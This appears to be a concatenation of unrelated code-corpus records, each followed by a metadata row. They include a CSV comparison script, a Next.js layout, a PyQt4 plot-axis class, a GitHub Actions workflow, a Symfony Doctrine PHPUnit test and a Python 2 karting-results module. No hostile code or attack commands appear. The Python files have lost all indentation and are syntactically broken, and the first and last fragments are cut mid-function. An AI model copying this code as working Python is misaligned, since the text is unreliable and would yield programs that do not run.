return a == b
dfs = [pandas.read_csv(f, sep=args.csv_sep, header=None) for f in (args.file_ref, args.file_new)]
if len(dfs) == 2:
for (ref_col_name, ref_col), (new_col_name, new_col) in zip(*(df.iteritems() for df in dfs)):
for ref_val, new_val in zip(ref_col, new_col):
if not compare(ref_val, new_val):
if returncode == 0:
returncode = 1
if not args.quiet:
print('mismatch in col {:2d} {} {}'.format(ref_col_name, ref_val, new_val))
else:
returncode = 2
sys.exit(returncode) | unknown | codeparrot/codeparrot-clean | ||
import React from 'react'
export default function Layout({ children }) {
return (
<html>
<head>
<title>My App</title>
</head>
<body>{children}</body>
</html>
)
} | javascript | github | https://github.com/vercel/next.js | bench/basic-app/app/layout.js |
"""
The Axis class display an axis on a graph
The axis contains a line with configurable style, possible arrows, and a title
.. attribute:: line_style
The LineStyle with which the axis line is drawn
.. attribute:: title
The string to be displayed alongside the axis
.. attribute:: title_above
A boolean which specifies whether the title should be placed above or below the axis
Normally the title would be above for top and left axes.
.. attribute:: title_location
can either be AxisStart, AxisEnd or AxisMiddle. The default is AxisMiddle
.. attribute:: arrows
A bitfield containing AxisEnd if an arrow should be drawn at the line's end (line.p2())
and AxisStart if there should be an arrows at the first point.
By default, there's an arrow at the end of the line
.. attribute:: zoomable
If this is set to True, the axis line will zoom together with the rest of the graph.
Otherwise, the line will remain in place and only tick marks will zoom.
.. method:: make_title
Makes a pretty title, with the quantity title in italics and the unit in normal text
.. method:: label_pos
Controls where the axis title and tick marks are placed relative to the axis
"""
from math import *
from PyQt4.QtGui import QGraphicsItem, QGraphicsLineItem, QGraphicsTextItem, QPainterPath, QGraphicsPathItem, QGraphicsScene, QTransform, QGraphicsRectItem, QPen, QFontMetrics
from PyQt4.QtCore import QLineF, QPointF, QRectF, Qt
from owconstants import *
from owtools import resize_plot_item_list
from owpalette import OWPalette
class OWAxis(QGraphicsItem):
Role = OWPalette.Axis
def __init__(self, id, title = '', title_above = False, title_location = AxisMiddle, line = None, arrows = 0, plot = None):
QGraphicsItem.__init__(self)
self.setFlag(QGraphicsItem.ItemHasNoContents)
self.setZValue(AxisZValue)
self.id = id
self.title = title
self.title_location = title_location
self.data_line = line
self.plot = plot
self.graph_line = None
self.size = None
self.scale = None
self.tick_length = (10, 5, 0)
self.arrows = arrows
self.title_above = title_above
self.line_item = QGraphicsLineItem(self)
self.title_item = QGraphicsTextItem(self)
self.end_arrow_item = None
self.start_arrow_item = None
self.show_title = False
self.scale = None
path = QPainterPath()
path.setFillRule(Qt.WindingFill)
path.moveTo(0, 3.09)
path.lineTo(0, -3.09)
path.lineTo(9.51, 0)
path.closeSubpath()
self.arrow_path = path
self.label_items = []
self.label_bg_items = []
self.tick_items = []
self._ticks = []
self.zoom_transform = QTransform()
self.labels = None
self.auto_range = None
self.auto_scale = True
self.zoomable = False
self.update_callback = None
self.max_text_width = 50
self.text_margin = 5
self.always_horizontal_text = False
def update_ticks(self):
self._ticks = []
major, medium, minor = self.tick_length
if self.labels is not None and not self.auto_scale:
for i, text in enumerate(self.labels):
self._ticks.append( ( i, text, medium, 1 ) )
else:
if self.scale and not self.auto_scale:
min, max, step = self.scale
elif self.auto_range:
min, max = self.auto_range
if min is not None and max is not None:
step = (max - min)/10
else:
return
else:
return
if max == min:
return
magnitude = int(3*log10(abs(max-min)) + 1)
if magnitude % 3 == 0:
first_place = 1
elif magnitude % 3 == 1:
first_place = 2
else:
first_place = 5
magnitude = magnitude / 3 - 1
step = first_place * pow(10, magnitude)
val = ceil(min/step) * step
while val <= max:
self._ticks.append( ( val, "%.4g" % val, medium, step ) )
val = val + step
def update_graph(self):
if self.update_callback:
self.update_callback()
def update(self, zoom_only = False):
self.update_ticks()
line_color = self.plot.color(OWPalette.Axis)
text_color = self.plot.color(OWPalette.Text)
if not self.graph_line or not self.scene():
return
self.line_item.setLine(self.graph_line)
self.line_item.setPen(line_color)
if self.title:
self.title_item.setHtml('<b>' + self.title + '</b>')
self.title_item.setDefaultTextColor(text_color)
if self.title_location == AxisMiddle:
title_p = 0.5
elif self.title_location == AxisEnd:
title_p = 0.95
else:
title_p = 0.05
title_pos = self.graph_line.pointAt(title_p)
v = self.graph_line.normalVector().unitVector()
dense_text = False
if hasattr(self, 'title_margin'):
offset = self.title_margin
elif self._ticks:
if self.should_be_expanded():
offset = 55
dense_text = True
else:
offset = 35
else:
offset = 10
if self.title_above:
title_pos = title_pos + (v.p2() - v.p1())*(offset + QFontMetrics(self.title_item.font()).height())
else:
title_pos = title_pos - (v.p2() - v.p1())*offset
## TODO: Move it according to self.label_pos
self.title_item.setVisible(self.show_title)
self.title_item.setRotation(-self.graph_line.angle())
c = self.title_item.mapToParent(self.title_item.boundingRect().center())
tl = self.title_item.mapToParent(self.title_item.boundingRect().topLeft())
self.title_item.setPos(title_pos - c + tl)
## Arrows
if not zoom_only:
if self.start_arrow_item:
self.scene().removeItem(self.start_arrow_item)
self.start_arrow_item = None
if self.end_arrow_item:
self.scene().removeItem(self.end_arrow_item)
self.end_arrow_item = None
if self.arrows & AxisStart:
if not zoom_only or not self.start_arrow_item:
self.start_arrow_item = QGraphicsPathItem(self.arrow_path, self)
self.start_arrow_item.setPos(self.graph_line.p1())
self.start_arrow_item.setRotation(-self.graph_line.angle() + 180)
self.start_arrow_item.setBrush(line_color)
self.start_arrow_item.setPen(line_color)
if self.arrows & AxisEnd:
if not zoom_only or not self.end_arrow_item:
self.end_arrow_item = QGraphicsPathItem(self.arrow_path, self)
self.end_arrow_item.setPos(self.graph_line.p2())
self.end_arrow_item.setRotation(-self.graph_line.angle())
self.end_arrow_item.setBrush(line_color)
self.end_arrow_item.setPen(line_color)
## Labels
n = len(self._ticks)
resize_plot_item_list(self.label_items, n, QGraphicsTextItem, self)
resize_plot_item_list(self.label_bg_items, n, QGraphicsRectItem, self)
resize_plot_item_list(self.tick_items, n, QGraphicsLineItem, self)
test_rect = QRectF(self.graph_line.p1(), self.graph_line.p2()).normalized()
test_rect.adjust(-1, -1, 1, 1)
n_v = self.graph_line.normalVector().unitVector()
if self.title_above:
n_p = n_v.p2() - n_v.p1()
else:
n_p = n_v.p1() - n_v.p2()
l_v = self.graph_line.unitVector()
l_p = l_v.p2() - l_v.p1()
for i in range(n):
pos, text, size, step = self._ticks[i]
hs = 0.5 * step
tick_pos = self.map_to_graph( pos )
if not test_rect.contains(tick_pos):
self.tick_items[i].setVisible(False)
self.label_items[i].setVisible(False)
continue
item = self.label_items[i]
item.setVisible(True)
if not zoom_only:
if self.id in XAxes or getattr(self, 'is_horizontal', False):
item.setHtml( '<center>' + Qt.escape(text.strip()) + '</center>')
else:
item.setHtml(Qt.escape(text.strip()))
item.setTextWidth(-1)
text_angle = 0
if dense_text:
w = min(item.boundingRect().width(), self.max_text_width)
item.setTextWidth(w)
if self.title_above:
label_pos = tick_pos + n_p * (w + self.text_margin) + l_p * item.boundingRect().height()/2
else:
label_pos = tick_pos + n_p * self.text_margin + l_p * item.boundingRect().height()/2
text_angle = -90 if self.title_above else 90
else:
w = min(item.boundingRect().width(), QLineF(self.map_to_graph(pos - hs), self.map_to_graph(pos + hs) ).length())
label_pos = tick_pos + n_p * self.text_margin - l_p * w/2
item.setTextWidth(w)
if not self.always_horizontal_text:
if self.title_above:
item.setRotation(-self.graph_line.angle() - text_angle)
else:
item.setRotation(self.graph_line.angle() - text_angle)
item.setPos(label_pos)
item.setDefaultTextColor(text_color)
self.label_bg_items[i].setRect(item.boundingRect())
self.label_bg_items[i].setPen(QPen(Qt.NoPen))
self.label_bg_items[i].setBrush(self.plot.color(OWPalette.Canvas))
item = self.tick_items[i]
item.setVisible(True)
tick_line = QLineF(v)
tick_line.translate(-tick_line.p1())
tick_line.setLength(size)
if self.title_above:
tick_line.setAngle(tick_line.angle() + 180)
item.setLine( tick_line )
item.setPen(line_color)
item.setPos(self.map_to_graph(pos))
@staticmethod
def make_title(label, unit = None):
lab = '<i>' + label + '</i>'
if unit:
lab = lab + ' [' + unit + ']'
return lab
def set_line(self, line):
self.graph_line = line
self.update()
def set_title(self, title):
self.title = title
self.update()
def set_show_title(self, b):
self.show_title = b
self.update()
def set_labels(self, labels):
self.labels = labels
self.graph_line = None
self.auto_scale = False
self.update_ticks()
self.update_graph()
def set_scale(self, min, max, step_size):
self.scale = (min, max, step_size)
self.graph_line = None
self.auto_scale = False
self.update_ticks()
self.update_graph()
def set_tick_length(self, minor, medium, major):
self.tick_length = (minor, medium, major)
self.update()
def map_to_graph(self, x):
min, max = self.plot.bounds_for_axis(self.id)
if min == max:
return QPointF()
line_point = self.graph_line.pointAt( (x-min)/(max-min) )
end_point = line_point * self.zoom_transform
return self.projection(end_point, self.graph_line)
@staticmethod
def projection(point, line):
norm = line.normalVector()
norm.translate(point - norm.p1())
p = QPointF()
type = line.intersect(norm, p)
return p
def continuous_labels(self):
min, max, step = self.scale
magnitude = log10(abs(max-min))
def paint(self, painter, option, widget):
pass
def boundingRect(self):
return QRectF()
def ticks(self):
if not self._ticks:
self.update_ticks()
return self._ticks
def bounds(self):
if self.labels:
return -0.2, len(self.labels) -0.8
elif self.scale:
min, max, _step = self.scale
return min, max
elif self.auto_range:
return self.auto_range
else:
return 0, 1
def should_be_expanded(self):
self.update_ticks()
return self.id in YAxes or self.always_horizontal_text or sum(len(t[1]) for t in self._ticks) * 12 > self.plot.width() | unknown | codeparrot/codeparrot-clean | ||
name: Junie
run-name: Junie run ${{ inputs.run_id }}
permissions:
contents: write
pull-requests: write
on:
workflow_dispatch:
inputs:
run_id:
description: "id of workflow process"
required: true
workflow_params:
description: "stringified params"
required: true
jobs:
call-workflow-passing-data:
uses: jetbrains-junie/junie-workflows/.github/workflows/ej-issue.yml@main
with:
workflow_params: ${{ inputs.workflow_params }}
fix_conflicts: false
skip_workflow_file_validation: false | unknown | github | https://github.com/ktorio/ktor | .github/workflows/junie.yml |
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <fabien@symfony.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Bridge\Doctrine\Tests\PropertyInfo;
use Doctrine\Common\Collections\Collection;
use Doctrine\Common\EventManager;
use Doctrine\DBAL\DriverManager;
use Doctrine\DBAL\Schema\DefaultSchemaManagerFactory;
use Doctrine\DBAL\Types\Type as DBALType;
use Doctrine\ORM\EntityManager;
use Doctrine\ORM\Mapping\Driver\AttributeDriver;
use Doctrine\ORM\ORMSetup;
use PHPUnit\Framework\Attributes\DataProvider;
use PHPUnit\Framework\TestCase;
use Symfony\Bridge\Doctrine\PropertyInfo\DoctrineExtractor;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineDummy;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineEmbeddable;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineEnum;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineGeneratedValue;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineRelation;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineWithEmbedded;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\EnumInt;
use Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\EnumString;
use Symfony\Component\TypeInfo\Type;
/**
* @author Kévin Dunglas <dunglas@gmail.com>
*/
class DoctrineExtractorTest extends TestCase
{
private function createExtractor(): DoctrineExtractor
{
$config = ORMSetup::createConfiguration(true);
$config->setMetadataDriverImpl(new AttributeDriver([__DIR__.'/../Tests/Fixtures' => 'Symfony\Bridge\Doctrine\Tests\Fixtures'], true));
$config->setSchemaManagerFactory(new DefaultSchemaManagerFactory());
$config->enableNativeLazyObjects(true);
$eventManager = new EventManager();
$entityManager = new EntityManager(DriverManager::getConnection(['driver' => 'pdo_sqlite'], $config, $eventManager), $config, $eventManager);
if (!DBALType::hasType('foo')) {
DBALType::addType('foo', 'Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineFooType');
$entityManager->getConnection()->getDatabasePlatform()->registerDoctrineTypeMapping('custom_foo', 'foo');
}
return new DoctrineExtractor($entityManager);
}
public function testGetProperties()
{
// Fields
$expected = [
'id',
'guid',
'time',
'timeImmutable',
'dateInterval',
'simpleArray',
'float',
'decimal',
'bool',
'binary',
'customFoo',
'bigint',
'json',
];
// Associations
$expected = array_merge($expected, [
'foo',
'bar',
'indexedRguid',
'indexedBar',
'indexedFoo',
'indexedBaz',
'indexedByDt',
'indexedByCustomType',
'indexedBuz',
'dummyGeneratedValueList',
]);
$this->assertEquals(
$expected,
$this->createExtractor()->getProperties(DoctrineDummy::class)
);
}
public function testTestGetPropertiesWithEmbedded()
{
$this->assertEquals(
[
'id',
'embedded',
],
$this->createExtractor()->getProperties('Symfony\Bridge\Doctrine\Tests\PropertyInfo\Fixtures\DoctrineWithEmbedded')
);
}
public function testGetPropertiesCatchException()
{
$this->assertNull($this->createExtractor()->getProperties('Not\Exist'));
}
public function testGeneratedValueNotWritable()
{
$extractor = $this->createExtractor();
$this->assertFalse($extractor->isWritable(DoctrineGeneratedValue::class, 'id'));
$this->assertNull($extractor->isReadable(DoctrineGeneratedValue::class, 'id'));
$this->assertNull($extractor->isWritable(DoctrineGeneratedValue::class, 'foo'));
$this->assertNull($extractor->isReadable(DoctrineGeneratedValue::class, 'foo'));
}
public function testExtractWithEmbedded()
{
$this->assertEquals(
Type::object(DoctrineEmbeddable::class),
$this->createExtractor()->getType(DoctrineWithEmbedded::class, 'embedded'),
);
}
public function testExtractEnum()
{
$this->assertEquals(Type::enum(EnumString::class), $this->createExtractor()->getType(DoctrineEnum::class, 'enumString'));
$this->assertEquals(Type::enum(EnumInt::class), $this->createExtractor()->getType(DoctrineEnum::class, 'enumInt'));
$this->assertNull($this->createExtractor()->getType(DoctrineEnum::class, 'enumStringArray'));
$this->assertEquals(Type::list(Type::enum(EnumInt::class)), $this->createExtractor()->getType(DoctrineEnum::class, 'enumIntArray'));
$this->assertNull($this->createExtractor()->getType(DoctrineEnum::class, 'enumCustom'));
}
#[DataProvider('typeProvider')]
public function testExtract(string $property, ?Type $type)
{
$this->assertEquals($type, $this->createExtractor()->getType(DoctrineDummy::class, $property, []));
}
/**
* @return iterable<array{0: string, 1: ?Type}>
*/
public static function typeProvider(): iterable
{
yield ['id', Type::int()];
yield ['guid', Type::string()];
yield ['bigint', Type::union(Type::int(), Type::string())];
yield ['time', Type::object(\DateTime::class)];
yield ['timeImmutable', Type::object(\DateTimeImmutable::class)];
yield ['dateInterval', Type::object(\DateInterval::class)];
yield ['float', Type::float()];
yield ['decimal', Type::string()];
yield ['bool', Type::bool()];
yield ['binary', Type::resource()];
yield ['foo', Type::nullable(Type::object(DoctrineRelation::class))];
yield ['bar', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::int())];
yield ['indexedRguid', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::string())];
yield ['indexedBar', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::string())];
yield ['indexedFoo', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::string())];
yield ['indexedBaz', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::int())];
yield ['simpleArray', Type::list(Type::string())];
yield ['customFoo', null];
yield ['notMapped', null];
yield ['indexedByDt', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::object())];
yield ['indexedByCustomType', null];
yield ['indexedBuz', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::string())];
yield ['dummyGeneratedValueList', Type::collection(Type::object(Collection::class), Type::object(DoctrineRelation::class), Type::int())];
yield ['json', null];
}
public function testGetTypeCatchException()
{
$this->assertNull($this->createExtractor()->getType('Not\Exist', 'baz'));
}
} | php | github | https://github.com/symfony/symfony | src/Symfony/Bridge/Doctrine/Tests/PropertyInfo/DoctrineExtractorTest.php |
### Minor changes to the library {#minor_library_changes} | unknown | github | https://github.com/golang/go | doc/initial/6-stdlib/99-minor/0-heading.md |
import ujson as json
import requests
import os
import re
from tinydb import where
from driver import Driver
class Session():
def __init__(self, config, round_obj, stype, sid="", filename=None):
self.config = config
self.round_obj = round_obj
self.stype = stype
self.sid = sid
self.filename = filename
self.data = []
self.name_corrections = self.config.get_driver_name_corrections_as_dict(self.round_obj.year)
self.point_adjustments = self.load_point_adjustments()
self.already_applied_point_adjustments = False
def get_type(self):
return self.stype
def get_id(self):
return self.sid
def get_round(self):
return self.round_obj
def get_name(self):
name = self.stype
if len(self.sid) > 0:
name += "-" + self.sid
return name
@staticmethod
def parse_name_into_stype_sid(name):
result = name.split("-")
stype = result[0]
sid = ""
if len(result) > 1:
sid = result[1]
return stype, sid
def get_short_name(self):
if self.stype == "PRACTICE":
return "P"
elif self.stype == "QUALIFY":
return "Q"
elif self.stype == "HEAT":
# for heats, we would like to remove all non-numbers (e.g. "heat 1D" -> "H1")
return "H" + re.sub("[^0-9]", "", self.sid)
elif self.stype == "MAIN":
return "M"
else:
raise NameError("Unrecognized session type: " + self.stype)
@staticmethod
def strip_leading_zeroes(s):
if s is not None:
while len(s) > 1 and s[0] == '0' and str(s[1]).isdigit():
s = s[1:]
return s
@staticmethod
def clean_string(s1=None, s2=None):
if s1 is not None:
s1 = str(s1).replace(" ", " ").strip()
if len(s1) > 0:
return s1
if s2 is not None:
s2 = str(s2).replace(" ", " ").strip()
if len(s2) > 0:
return s2
return None
def is_race(self):
return self.stype == "MAIN" or self.stype == "HEAT"
def get_leader(self):
result = self.data[0]
if result["pos"] != "1":
raise LookupError("Leader doesn't have first position: " + str(result))
return result
def get_time_difference(self, given_time, leader_time):
if given_time == "N/A" or leader_time == "N/A":
return "N/A"
t1 = self.str_time_to_float(given_time)
t2 = self.str_time_to_float(leader_time)
return str(t1 - t2)
@staticmethod
def str_time_to_float(str_time):
# convert strings like "01:04.751" or "59.833" into floating-point number of seconds
items = str_time.split(":")
if len(items) == 1:
return float(items[0])
elif len(items) == 2:
return float(items[0]) * 60 + float(items[1])
elif len(items) == 3:
return float(items[0]) * 60 * 60 + float(items[1]) * 60 + float(items[2])
else:
raise TypeError("Invalid time: " + str_time)
def get_url(self, mylaps_id):
return self.config.get_mylaps_session_page_url() + str(mylaps_id)
def download(self, mylaps_id):
response = requests.get(self.get_url(mylaps_id))
self.data = json.loads(response.content)
# determine the directory
dirname = self.round_obj.get_directory()
if not os.path.exists(dirname):
os.makedirs(dirname)
# store the json
with open(dirname + "/" + self.get_name() + ".json", "w") as outfile:
json.dump(self.data, outfile)
# print name of the event
print " [x] Downloaded '%s': %s" % (self.get_name(), self.get_url(mylaps_id))
def read(self):
# determine the directory
dirname = self.round_obj.get_directory()
fname = dirname + '/' + self.filename
# print name of the event
print " [x] Reading %s from '%s'" % (self.get_name(), fname)
# Practice & Qualifier & Heat & Main
# "position" - integer
# "start_number" - kart number
# "driver" - driver name (spaces must be be trimmed from both ends)
# "best_time" - best lap
# "best_lap" - lap when best time was set
# "laps" - number of completed laps
# "diff_time" - time difference from P1 (can be empty for P1 and also for last drivers. can also be DNF or DQ)
data = json.load(open(fname))
for row in data["classification"]["rows"]["default"]:
entry = {
"pos": self.clean_string(row["position"]),
"kart": self.clean_string(row["start_number"]),
"driver_name": self.clean_string(row["driver"]),
"best_lap_time": self.strip_leading_zeroes(self.clean_string(row.get("best_time")))
}
if entry["best_lap_time"] is None:
entry["best_lap_time"] = "N/A"
# process driver status and copy it to pos too
entry["status"] = row["status"].upper()
if entry["status"] == 'NORMAL':
# change it to a shorter version
entry["status"] = 'OK'
elif not self.is_not_regular_finish(entry["status"]):
# if not DQ, DNF, or DNS, then raise exception
raise LookupError("Unrecognized driver status in the session: " + row["status"])
if self.is_race():
entry["best_lap_number"] = self.clean_string(row.get("best_lap"))
if entry["best_lap_number"] is None:
entry["best_lap_number"] = "N/A"
entry["laps_completed"] = self.clean_string(row["laps"])
entry["gap_to_leader"] = self.strip_leading_zeroes(self.clean_string(row["diff_time"]))
if entry["laps_completed"] is None:
entry["laps_completed"] = "0"
if entry["gap_to_leader"] is None:
entry["gap_to_leader"] = ""
else:
# to workaround differences between "1 Lap" and "1 lap"
entry["gap_to_leader"] = entry["gap_to_leader"].upper()
self.data.append(entry)
# reassign all positions
self.reassign_positions()
# calculate difference between best laps
self.recalculate_best_lap_gaps()
def merge_with(self, another):
# this is useful for merging the results of mains into one single sheet
# and then awarding points for the combined/unified race, from top to bottom
for entry in another.data:
self.data.append(entry)
@staticmethod
def is_not_regular_finish(status):
return status == 'DQ' or status == 'DNF' or status == 'DNS'
def remove_not_finished(self):
# drivers who got disqualified, or didn't finish, or didn't start will be removed
# useful for merging the qualifiers together and keeping only drivers with valid best laps
self.data = [c for c in self.data if c["status"] == 'OK']
def remove_na_best_time(self):
# drivers who didn't go on a track don't have best lap time, so this method get rids of them
self.data = [c for c in self.data if c["best_lap_time"] != "N/A"]
def remove_duplicate_drivers_advanced_to_mains(self, season_data):
# drivers who advance from one main to another (e.g. from B-main to A-main) are present in both groups
# so, when calculating points, these duplicates should be removed
driver_names = {}
for entry in self.data:
driver_name, driver_classes = self.get_driver_name_and_classes(entry["driver_name"], season_data)
# if driver is already present in the map, the all following occurrences should be removed
if driver_name in driver_names:
# let's see which one needs to be removed
entry_higher = driver_names[driver_name]
# if driver finished in the higher entry, then the lower one needs to be removed
# otherwise, we need to remove the higher one (e.g. A-main = DQ, B-main = points)
if entry_higher["status"] == 'OK':
entry["to_be_removed"] = 1
else:
entry_higher["to_be_removed"] = 1
else:
driver_names[driver_name] = entry
# remove drivers marked for removal
self.data = [c for c in self.data if not "to_be_removed" in c]
def reassign_positions(self):
position = 1
for entry in self.data:
entry["pos"] = str(position)
position += 1
def recalculate_best_lap_gaps(self):
leader = self.get_leader()
for entry in self.data:
entry["best_lap_diff"] = self.get_time_difference(entry["best_lap_time"], leader["best_lap_time"])
def compare_by_time(self, x, y):
x_float = self.str_time_to_float(x)
y_float = self.str_time_to_float(y)
if x_float < y_float:
return -1
elif x_float > y_float:
return 1
else:
return 0
def sort_by_best_time(self):
self.data = sorted(self.data, cmp=lambda x, y: self.compare_by_time(x, y), key=lambda x: x['best_lap_time'])
def get_driver_name_and_classes(self, driver, season_data=None):
# capture the part in square brackets "MR", assuming driver name will be something like "John Doe [M][R]"
# note, that the driver can be on multiple classes: "M" means masters, "R" means rookie, etc.
driver_class_list = re.findall("\[(.*?)\]", driver)
# put all classes into the set
driver_classes = set("")
for driver_class in driver_class_list:
# check if it's a valid driver class
if (season_data is not None) and (driver_class not in season_data.get_driver_classes()):
print "Unrecognized driver class: " + driver
else:
driver_classes.add(driver_class)
# this will actually remove the part in brackets
driver_name = re.sub("\[.*?\]", "", driver)
# also, remove double spaces and leading/trailing spaces too
driver_name = driver_name.replace(" ", " ").strip()
# also, apply corrections from the DB
if driver_name in self.name_corrections:
driver_name = self.name_corrections[driver_name]
# return the tuple
return driver_name, driver_classes
def lookup_driver_row_idx(self, driver_name):
# find driver
idx = -1
for i in xrange(len(self.data)):
entry = self.data[i]
if entry["driver_name_canonical"] == driver_name:
idx = i
break
return idx
def apply_adjustment_move_driver(self, driver_name, is_move_up):
idx = self.lookup_driver_row_idx(driver_name)
# if not found, return right away
if idx < 0:
return False
# swap drivers (up)
if is_move_up and idx - 1 >= 0:
t = self.data[idx]
self.data[idx] = self.data[idx - 1]
self.data[idx - 1] = t
return True
# swap drivers (down)
if not is_move_up and idx + 1 < len(self.data):
t = self.data[idx]
self.data[idx] = self.data[idx + 1]
self.data[idx + 1] = t
return True
return False
def apply_adjustment_assign_points_to_driver(self, driver_name, points):
idx = self.lookup_driver_row_idx(driver_name)
# if not found, return right away
if idx < 0:
return False
self.data[idx]["points"] = points
return True
def apply_non_droppable(self, driver_name):
idx = self.lookup_driver_row_idx(driver_name)
# if not found, force addition of entry to the list (likely, the driver has been suspended)
if idx < 0:
# entry needs to be added, otherwise it won't count as non-droppable
driver_name_canonical, driver_classes = self.get_driver_name_and_classes(driver_name)
entry = {
"pos": int(self.data[-1]["pos"]) + 1,
"driver_name": driver_name,
"driver_name_canonical": driver_name_canonical,
"status": 'DNS',
"kart": 'N/A',
"best_lap_time": 'N/A',
"best_lap_number": "N/A",
"laps_completed": "0",
"gap_to_leader": ""
}
self.data.append(entry)
idx = self.lookup_driver_row_idx(driver_name)
self.data[idx]["non_droppable"] = True
return True
def apply_point_adjustments(self):
if self.already_applied_point_adjustments:
return
# iterate through stored adjustments
count_applied = 0
for driver_name, adjustment_list in self.point_adjustments.iteritems():
for adjustment in adjustment_list:
# for position-based adjustments
if adjustment['type'] == 'adjust_position':
positions = adjustment['positions']
for i in xrange(abs(positions)):
if not self.apply_adjustment_move_driver(driver_name, positions <= 0):
break
# for point-based adjustments
if adjustment['type'] == 'adjust_points':
points = adjustment['points']
self.apply_adjustment_assign_points_to_driver(driver_name, points)
# for non-droppable events
if adjustment['type'] == 'non_droppable':
self.apply_non_droppable(driver_name)
count_applied += 1
# if something was applied, we need to reassign positions
if count_applied > 0:
self.reassign_positions()
self.already_applied_point_adjustments = True
def calc_points(self, drivers, season_data):
if not season_data.is_score_points(self.stype):
raise LookupError("Points should be awarded, but can't find them in season configuration")
# add an entry to the dictionary, if it's not there
for entry in self.data:
driver_name, driver_classes = self.get_driver_name_and_classes(entry["driver_name"], season_data)
# determine and store canonical name
entry["driver_name_canonical"] = driver_name
# add an entry to the dictionary, if it's not there
driver = Driver(driver_name)
if not driver in drivers:
drivers[driver] = driver
else:
driver = drivers[driver]
# add discovered classes to the driver
driver.add_classes(driver_classes)
# apply all stored point adjustments
self.apply_point_adjustments()
# process the actual points
for entry in self.data:
# look up driver
driver = drivers[Driver(entry["driver_name_canonical"])]
# determine driver position
position = entry["pos"]
# if points were overwritten as a part of post-race adjustments, then assign this exact value
if "points" in entry:
driver.set_points(self, entry["points"], entry["status"], "non_droppable" in entry)
continue
# assign points based on the status & position
if entry["status"] == 'OK':
# this is a regular finish
points = season_data.get_driver_points(self.stype, position)
entry["points"] = points
driver.set_points(self, points, entry["status"], "non_droppable" in entry)
elif entry["status"] == 'DNS':
# DNS is 'did not start'
# person gets 0 points always. he stays on the rankings, but it creates a gap in points
entry["points"] = 0
driver.set_points(self, 0, entry["status"], "non_droppable" in entry)
elif entry["status"] == 'DNF':
# DNF is 'did not finish'
# we just assign points in order in this case
# i.e. someone who crashed on lap 5 gets less points vs. someone who crashed on lap 6
points = season_data.get_driver_points(self.stype, position)
entry["points"] = points
driver.set_points(self, points, entry["status"], "non_droppable" in entry)
elif entry["status"] == 'DQ':
# DQ - by default it's zero points
# it can be overwritten later by the admin
entry["points"] = 0
driver.set_points(self, 0, entry["status"], "non_droppable" in entry)
else:
# unknown driver status
raise LookupError("Unknown driver status while assigning points: " + str(entry["status"]))
def store_points(self, suffix=""):
# create the directory
dirname = self.config.get_results_directory() + "/" + str(self.round_obj.year) + \
"-round-" + str(self.round_obj.num)
if not os.path.exists(dirname):
os.makedirs(dirname)
# determine the resulting file
fname = dirname + "/" + self.get_name()
if suffix:
fname += "-" + suffix
fname += ".json"
# store the table
print " [x] Saving results to '%s'" % fname
with open(fname, "wb") as json_file:
json.dump(self.data, json_file)
def load_points(self):
# create the directory
dirname = self.config.get_results_directory() + "/" + str(self.round_obj.year) + \
"-round-" + str(self.round_obj.num)
if not os.path.exists(dirname):
os.makedirs(dirname)
# determine the resulting file
fname = dirname + "/" + self.get_name() + ".json"
# store the table
with open(fname, "rb") as json_file:
self.data = json.load(json_file)
def is_approved(self):
session_data_table = self.config.get_db_connection().table('session_data')
results = session_data_table.search(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name())
)
if not results:
return None
return results[0]['approved']
def store_approved_status(self, approved_status):
session_data_table = self.config.get_db_connection().table('session_data')
session_data_table.remove(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name())
)
if approved_status:
session_data_table.insert(
{
'season': self.get_round().year,
'round': self.get_round().num,
'session_name': self.get_name(),
'approved': approved_status
}
)
def load_point_adjustments(self):
session_adjustments = self.config.get_db_connection().table('session_adjustments')
list_of_adjustments = session_adjustments.search(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name())
)
result = {}
for item in list_of_adjustments:
if not item['driver_name'] in result:
result[item['driver_name']] = []
result[item['driver_name']].append(item)
return result
def store_adjustment_of_driver_position(self, driver, positions, reason):
driver_name, driver_classes = self.get_driver_name_and_classes(driver)
session_adjustments = self.config.get_db_connection().table('session_adjustments')
session_adjustments.remove(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name()) &
(where('driver_name') == driver_name) &
(where('type') == 'adjust_position')
)
session_adjustments.insert(
{
'season': self.get_round().year,
'round': self.get_round().num,
'session_name': self.get_name(),
'driver_name': driver_name,
'type': 'adjust_position',
'positions': positions,
'reason': reason
}
)
def store_adjustment_of_driver_points(self, driver, points, reason):
driver_name, driver_classes = self.get_driver_name_and_classes(driver)
session_adjustments = self.config.get_db_connection().table('session_adjustments')
session_adjustments.remove(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name()) &
(where('driver_name') == driver_name) &
(where('type') == 'adjust_points')
)
session_adjustments.insert(
{
'season': self.get_round().year,
'round': self.get_round().num,
'session_name': self.get_name(),
'driver_name': driver_name,
'type': 'adjust_points',
'points': points,
'reason': reason
}
)
def store_non_droppable_event(self, driver, reason):
driver_name, driver_classes = self.get_driver_name_and_classes(driver)
